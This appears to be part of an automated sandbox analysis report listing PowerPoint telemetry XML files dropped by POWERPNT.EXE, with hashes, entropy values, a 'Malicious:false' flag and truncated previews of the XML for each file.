                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4521
                                                                                                                              Entropy (8bit):3.569115881633309
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dCV2mrXttVgf/ThWXTDPpwOeu2sa/s229CL219T2d6gdW2RfniCly4Cw:cgZLttVsh6TbpZaED1xG7ly4Cw
                                                                                                                              MD5:A3CF23A6CE90D732326537FAE746AF4A
                                                                                                                              SHA1:B3C5A46E7750C55FBF32F41851714BA1CE4FB2C3
                                                                                                                              SHA-256:2D994E492F488B58D66C00EB3BBAF92FF3114873862F6F2AD60E1A1FF28E065A
                                                                                                                              SHA-512:84957135622C728FDE21EC83ECD71AD48DA6555ED2E67B2B34D4BBAC4E308FBECD8D41A3C5500D31A35B4AEB2A5BE5BFD573CD6FBE667594CBCBEBA55F1424BE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150135" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.SlideShow.AnimationRenderEvents" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="aq4c0" />.. <R T="2" R="150133" />.. <F T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Feature" />.. </L>.. <R>.. <V V="Show" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="Event" />.. </L>.. <R>.. <V V="Finish" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="0" />.. </L>.. <R>.. <V V="Animation" T="W" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="AND">.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4529
                                                                                                                              Entropy (8bit):3.5687041537074995
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dsui2mrXttVgf/ThWXTDDEpwOeu2sa/s229CL219T2d6gdW2RfnvzuClsyR/3RR:csBZLttVsh6TnEpZaED1xGblBhUw
                                                                                                                              MD5:074021B382891128260896BBC58E0AA3
                                                                                                                              SHA1:40DC8E8D2BBC144742AA4BE5F0C96F974E0A6B8C
                                                                                                                              SHA-256:283DAB731EAC2B8702AD122AA07D6F0DF5F5F7A554F85F3191D7EA733E0CBC58
                                                                                                                              SHA-512:0235660C1CF043D1666E73ED0DF9D68F459C128952D74E2AB35A4DE1DBD42CC4EACB532D34E946399FF3B9FA7C96BF6ACA730FEE19499AEA21F24EF21ACF8ACB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150136" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.SlideShow.TransitionRenderEvents" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="aq4c0" />.. <R T="2" R="150133" />.. <F T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Feature" />.. </L>.. <R>.. <V V="Show" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="Event" />.. </L>.. <R>.. <V V="Finish" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="0" />.. </L>.. <R>.. <V V="Transition" T="W" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="AND">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4509
                                                                                                                              Entropy (8bit):3.5427960508460714
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dsaF0H2mrXttVgf/ThWXTDjwOeu2d6/dW2WCy2B9v2yge21fja0q0NmJ0t0ii01:cT6HZLttVsh6TnNWg9sLnQmCif4Lw
                                                                                                                              MD5:3EE9A0E59D61B744045BF6C6AA7A6460
                                                                                                                              SHA1:051E60D5FEE3A3180C7A180B463C7C1F6E48BA04
                                                                                                                              SHA-256:7A81E62C3539FC8A3A78CE9E70AA4743ECFC34C2F0E18327E802744783A602A7
                                                                                                                              SHA-512:F0213254B3A38DA561F627BE075F64E20E3292776BF00BDC9A6A31460E9BEFF36073C88B55A5F9FD654A798C3E2882935BF79015B46820869A7720B8A4052176
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150137" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.SlideShow.MediaRenderEvents" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="aq4c0" />.. <R T="2" R="150133" />.. <F T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Feature" />.. </L>.. <R>.. <V V="Show" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="Event" />.. </L>.. <R>.. <V V="Finish" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="0" />.. </L>.. <R>.. <V V="Media" T="W" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="AND">.. <L>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3529
                                                                                                                              Entropy (8bit):3.615153153569248
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d6Px2VYrkmtV9f/TLXO9f/TLCwOf9fhTLXc9fhTLzcj9fE+TLM6hrxX2XK:cQxFImtV1rO1etLrcLsjmiYcH
                                                                                                                              MD5:81E3E0C6626DCE665791C8564B132F6C
                                                                                                                              SHA1:5A0AF64BE5CED83A235B1F19AC07C60E523E3B33
                                                                                                                              SHA-256:E18CC941D74EA7E630B877CD62DEF7525B3B59D508B434FEE6A587B3D3615615
                                                                                                                              SHA-512:8AADA34CBBBED4C5EE7052EC58A13F2C8E0BC0772E35BEAE8766E9073A04A66E0984FC728EFA5ACFB88BC400D6F8816191B4DE0074D8BFF819C6BA81840ABC41
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150138" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.SlideShow.Stats" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <R T="1" R="150133" />.. <UTS T="2" Id="aq4c0" />.. <F T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="2" F="Feature" />.. </L>.. <R>.. <V V="Show" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="2" F="Event" />.. </L>.. <R>.. <V V="Finish" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="4">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="2" F="Feature" />.. </L>.. <R>.. <V V="Show" T="W" />.. </R>.. </O>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1499
                                                                                                                              Entropy (8bit):5.0403932598502035
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdVycFD91/GbSerKoha0wuXwFap97XDna40HdN1xrXPae0DXRrODoX3HaHs04d:2dxF90FrRvAYMD1JuDooH8j4SPUo3i
                                                                                                                              MD5:B66070B665C869A0368C97F5AB869245
                                                                                                                              SHA1:8B9C667A7471E7A4759CC491C3DFFFE2C2DB523B
                                                                                                                              SHA-256:897978A9273CE767385E6BD0949BEFE7679FFFB513AA20A3D787FE5B293892F5
                                                                                                                              SHA-512:A419AE5A17B8D3D4D1C17FD27CC5D11BE935EB9A4009A555E28551EF8AD5EC765BC56D863769B4C74FF65AC9B46401999BFD48F68D44D01B7C72AB11724ADE49
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150140" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.SlideContentTelemetry.Part3" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bo1zh" />.. </S>.. <C T="G" I="0" O="true" N="CorrelationId">.. <S T="1" F="CorrelationId" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="SlidesWithCharts">.. <S T="1" F="SlidesWithCharts" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="ChartsCount">.. <S T="1" F="ChartsCount" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="SlidesWithTables">.. <S T="1" F="SlidesWithTables" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="TablesCount">.. <S T="1" F="TablesCount" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="SlidesWithSmartArts">.. <S T="1" F="SlidesWithSmartArts" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="SmartArtsCount">.. <S T="1" F="SmartArtsCount" M="Ignore" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3422
                                                                                                                              Entropy (8bit):4.954705113594458
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2digmraPnd9b1LmFePc8oRD/NZAzBUdQPyNACrv2xhNbO9SNc9:cGe9RsyvOD/H3eymCKhU9S29
                                                                                                                              MD5:701E28F06EB7D972C5AD6268D57314EA
                                                                                                                              SHA1:9E8B7809BCE458F63EEC3ED398032428DE740D7F
                                                                                                                              SHA-256:0E9C4489F3AAB36DC0A89C131D5C3A62D5567B46CAE1DA78941BC537D514A493
                                                                                                                              SHA-512:4E9C5F178FAB2B19EF9AA7E3EE6CE610F095254D3C887DE74CD62CB0D4FFCAFEF0F9D5B66FC1E9881DD07A51313CEE95E7C5527B78F7CB7FD9CD4CED46CAAA6C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150207" V="0" DC="SM" EN="Office.PowerPoint.PPT.ShapeDiff" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k" />.. </S>.. <C T="FT" I="0" O="true" N="ShapeDiffTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Shape_Add">.. <S T="1" F="SpDiff_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Shape_Delete">.. <S T="1" F="SpDiff_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Shape_Position">.. <S T="1" F="SpDiff_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Shape_Content">.. <S T="1" F="SpDiff_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Shape_Type">.. <S T="1" F="SpDiff_16" M="Ignore" />.. </C>.. <C T="U32" I="7" O="true" N="Shape_GroupLayout">.. <S
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3023
                                                                                                                              Entropy (8bit):4.938258859381422
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dj7traP5l56Cjj1e87/RjScCekNemTQ/N+sAoa8MbEEcfFcKTmSWnYOA:clG6Cjpe8rFSfekNdQ/IspDM+T5ei
                                                                                                                              MD5:C073E656DBBF92A603E44858BCD45A82
                                                                                                                              SHA1:401F6011E8C14862FF841898EC988BF98DCE07F8
                                                                                                                              SHA-256:3B467EC66017D624E2030475BF7B5154F7EE836F50B9127CE7794046E4705597
                                                                                                                              SHA-512:BF073A838B10BDE6EA57A8597B98E21B74225E1A83AF9EAF7D2448834B3BCEB74F45228B87B910A49DED1362316AD83E53FE276B45F144689008C25610297A7D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150208" V="0" DC="SM" EN="Office.PowerPoint.PPT.SlideAndTableDiff" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Slide_Add">.. <S T="1" F="SldDiff_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Slide_Delete">.. <S T="1" F="SldDiff_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Slide_Background">.. <S T="1" F="SldDiff_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Slide_Shapes">.. <S T="1" F="SldDiff_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Slide_ColorScheme">.. <S T="1" F="SldDiff_16" M="Ignore" />.. </C>.. <C T="U32" I="7"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3405
                                                                                                                              Entropy (8bit):4.927373928216011
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dghtraPndXs61Lmam2zcUo5lNezGdYPmbt5v+FZLb4R9SjC:caeXsOxmktsl/mmxWZg9SW
                                                                                                                              MD5:50351DCB814C473AC75D86439445869B
                                                                                                                              SHA1:ECBB1655D5350927E2223EAC99A0DA4A8C1E49CE
                                                                                                                              SHA-256:AE9141125B9B459EF23AEBF61BA035AB26A3DA3DD22676C9FE1B3CE02428C5CA
                                                                                                                              SHA-512:2C902BC5E4BB17BDDAFEEB794C9902F6481A5BE49669284ED1273C93700AFD048D726F4854FE739E4DE43642AE2ACF38FF21014B3511FE313CE49752BF40CCF1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150209" V="0" DC="SM" EN="Office.PowerPoint.PPT.ShapeConflict" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k" />.. </S>.. <C T="FT" I="0" O="true" N="ShapeDiffTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Shape_Add">.. <S T="1" F="SpCft_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Shape_Delete">.. <S T="1" F="SpCft_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Shape_Position">.. <S T="1" F="SpCft_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Shape_Content">.. <S T="1" F="SpCft_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Shape_Type">.. <S T="1" F="SpCft_16" M="Ignore" />.. </C>.. <C T="U32" I="7" O="true" N="Shape_GroupLayout">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2797
                                                                                                                              Entropy (8bit):4.908251642603629
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dpetraP5l56KjE61eFQ7pTjccCckHemLeN+5oPMDFX+QrbXBpw0:cqG6KjNeFQlncfckHheIuPMRXRb80
                                                                                                                              MD5:4A56BA0365FF749CF42C25057780E02F
                                                                                                                              SHA1:10BDD4DA718DC6BB331E5E8D0BFD049BE703AA5D
                                                                                                                              SHA-256:239DB7C343C5827F5B49CA93162D9C97E7F551ED1978438ECF0E4289E5AC1460
                                                                                                                              SHA-512:E38F6C27356AE1C3B2EF79CAD490FE6BE9E962F3059787DD55D659EFECC621DD5C16B296F81386B4FE5F0BE0FBFDDA12F05F3B2745EA8DAA8DC4AAE1C75E6679
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150210" V="1" DC="SM" EN="Office.PowerPoint.PPT.SlideAndTableConflict" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Slide_Add">.. <S T="1" F="SldCft_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Slide_Delete">.. <S T="1" F="SldCft_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Slide_Background">.. <S T="1" F="SldCft_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Slide_Shapes">.. <S T="1" F="SldCft_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Slide_ColorScheme">.. <S T="1" F="SldCft_16" M="Ignore" />.. </C>.. <C T="U32" I="7" O
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1195
                                                                                                                              Entropy (8bit):4.961741557764059
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdErUcOPR4e//GbjWnerPqSernerJNXahIJogagyoXKOHaM9GQ/fKoO4N1xTNM:2dErxOPR4rtrPqFrerZwG1PJ136hgg
                                                                                                                              MD5:DBBED61D33B05CE74DFB9F24EED0EDEC
                                                                                                                              SHA1:3C571201B8B97A6EA4ED1D5A15E4BCF298AC17B2
                                                                                                                              SHA-256:D3433E10FCBA4E453BA64D383340201C2ABEEA98CB019546818BF27A4D66EECC
                                                                                                                              SHA-512:9FF31E6F4AAB8D9841224756C3573CCF016190C33EFB277C60E824A8C474DFEC2F602450D79D8A23D126DCB789D15764A972D5DE39CF429BB8BCFE7141F93649
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150213" V="1" DC="SM" EN="Office.PowerPoint.PPT.SendRealtimeTextTyping" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bae8k" />.. <UTS T="2" Id="a8j0a" />.. <UTS T="3" Id="bb34t" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="G" I="0" O="true" N="CorrelationId">.. <S T="4" F="CorrelationId" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="RTMsCount">.. <S T="4" F="RTMsCount" M="Ignore" />.. </C>.. <C T="U64" I="2" O="true" N="SerializeTimeInMs">.. <S T="4" F="SerializeTimeInMs" M="Ignore" />.. </C>.. <C T="U64" I="3" O="true" N="SizeInBytes">.. <S T="4" F="SizeInBytes" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="CountOfSentRetries">.. <S T="4" F="CountOfSentRetries" M="Ignore" />.. </C>.. <C T="W" I="5" O="true" N="ThrottleReason">.. <S T="4" F="Th
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):831
                                                                                                                              Entropy (8bit):5.108562635776414
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdFAa4Dcv/GbaAQzWnerlHSkEfMMyjlHStpKLIVjls+aSbO9N1Dp+YLbOYVNOQ:2dFAHYrdSV6nk1BM1VXLb
                                                                                                                              MD5:12723115FDBD48BA01137E18BCBCD90F
                                                                                                                              SHA1:9A1D41EDFC644F632D902BF93D72DCC876966CE8
                                                                                                                              SHA-256:79D8D57024E72647961335D7A1765A97CE433E5944B73EEEB3DF1A6928AEE2B3
                                                                                                                              SHA-512:DEB4606C785EC6F0F459D9A78382EFC6147D23F75E21B165C741445275CF5E49CA869EB74F12DD564670827DE3A2E571A91878A123747E284F6817355EEE827E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150214" V="0" DC="SM" EN="Office.PowerPoint.PPT.DiscontinuousRealtimeMessage" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bb8d5" />.. </S>.. <C T="W" I="0" O="false" N="SendClientID">.. <S T="1" F="SendClientID" />.. </C>.. <C T="FT" I="1" O="false" N="LastSentTime">.. <S T="1" F="LastSentTime" />.. </C>.. <C T="U32" I="2" O="false" N="LastRevisionNumber">.. <S T="1" F="LastRevisionNumber" />.. </C>.. <C T="FT" I="3" O="false" N="CurrentSentTime">.. <S T="1" F="CurrentSentTime" />.. </C>.. <C T="U32" I="4" O="false" N="CurrentRevisionNumber">.. <S T="1" F="CurrentRevisionNumber" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):873
                                                                                                                              Entropy (8bit):4.8328136742864825
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdux26A/GbaAQzWnerLnerIVDROW8/ROfzE+a6G/b8OKX/c//fpONkMdOfCxN0:2du46LYrar3Ya6G2Be7
                                                                                                                              MD5:B9434A5B634B11078DF230E32A1ED84A
                                                                                                                              SHA1:B7B48E5B5D0A553F42DFEC15CABD06903BB1C1C6
                                                                                                                              SHA-256:28A9889BFE54AF99DAA645706BF2B380CCB2FD756268204CD99830CDFE1AD6C4
                                                                                                                              SHA-512:D112B7D5AC37610A64282B9283329898E66CB2A0BDABD0FEC3F3BA2BBF25F99334C7F94BD66F7BE5EC4A094F5A9FC4A0E826AC4A40BEEF2F19715B55ADF6645D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150217" V="0" DC="SM" EN="Office.PowerPoint.PPT.PresenceEditorInfo" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="befwe" />.. <UTS T="2" Id="befwf" />.. </S>.. <G>.. <S T="1">.. <F N="ClientId" />.. </S>.. <S T="2">.. <F N="ClientId" />.. </S>.. </G>.. <C T="U32" I="0" O="true" N="PresenceToEditorInfoDuration">.. <U T="100nsToMs">.. <O T="SUB">.. <L>.. <S T="2" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="1" F="TimeStamp100ns" />.. </R>.. </O>.. </U>.. </C>.. <C T="W" I="1" O="false" N="ClientId">.. <S T="1" F="ClientId" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):492
                                                                                                                              Entropy (8bit):5.226986235423353
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdhWW1vS/GboWnerF3JdMMlKxjLt/wLHNO2su:2dF5NmrFkh4h
                                                                                                                              MD5:B15811049E409472694453C475521C4E
                                                                                                                              SHA1:63D7E1E207B8511D8F0F4D08EF13272979235F1B
                                                                                                                              SHA-256:98CF0865A8E28A2F7CD3ED153000DAD8DD9A6513EF24A14EFB29D862CB1E672F
                                                                                                                              SHA-512:035378C7681A038471DBD9D989DF6603D72947DA0A00E60C3B8AF4CBEA92F303EB02610D8D12DB318D9E2C21DFE5D1C0225020EF551375A2652528AB81711EF8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150218" V="1" DC="SM" EN="Office.PowerPoint.PPT.LockedTextDuration" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bd0do" />.. </S>.. <C T="I64" I="0" O="false" N="LockDurationMs">.. <S T="1" F="LockDuration(ms)" />.. </C>.. <C T="U32" I="1" O="false" N="LockedSession">.. <S T="1" F="LockedSession" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):492
                                                                                                                              Entropy (8bit):5.1488332166447766
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdQl4d//GbaAQXerLnertF26nXHaSMNO/HNUlu:2dQvjryrfnp7
                                                                                                                              MD5:123442BDB3A5A87384A49CAD5AA1E9C8
                                                                                                                              SHA1:58665C7492665A56D547A34E38618A7406B97F69
                                                                                                                              SHA-256:32CF48774BC64560322574AF29FB687B73C087B55B3B820CBFD566E5522BA520
                                                                                                                              SHA-512:8A5EFE27D5BA9C0BC973830A216CE21249107750E9463D66A125BFFFB921A2054EB7125A80CD72B418DCC1AB91DF360ADEB2273D76D3A3BA60792F921F607854
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150219" V="1" DC="SM" EN="Office.PowerPoint.PPT.TypingInLockedText" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bem1d" />.. <UTS T="2" Id="bbzi1" />.. </S>.. <C T="U32" I="0" O="false" N="TypingCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):729
                                                                                                                              Entropy (8bit):5.050609474350326
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdwJS/GbjWner2erjDxMfX/fiMyjgXESHaSMwc/juc6BjiOXNOjsu:2dGNtrJrS/1jXEFLf6BA
                                                                                                                              MD5:AF68AFD7F5D7F46811AA4AF9CB2D02B5
                                                                                                                              SHA1:D56CC02BCC0D80A2E48C22059A2083E92D9F1815
                                                                                                                              SHA-256:D7A99BDE8E1097833C16DFC5784AEEC7AA369E32806064A257CEAAAFBD727167
                                                                                                                              SHA-512:4BAEFD469E1F8D41B0FB19C7510A5ECEFF2F3847F0FAA35DFF63A4C08322355C6C29239A2C88A35CF7D1367100749F37BE8BD0AF9A2C3725E33086814D4FBBAA
                                                                                                                              Malicious:false
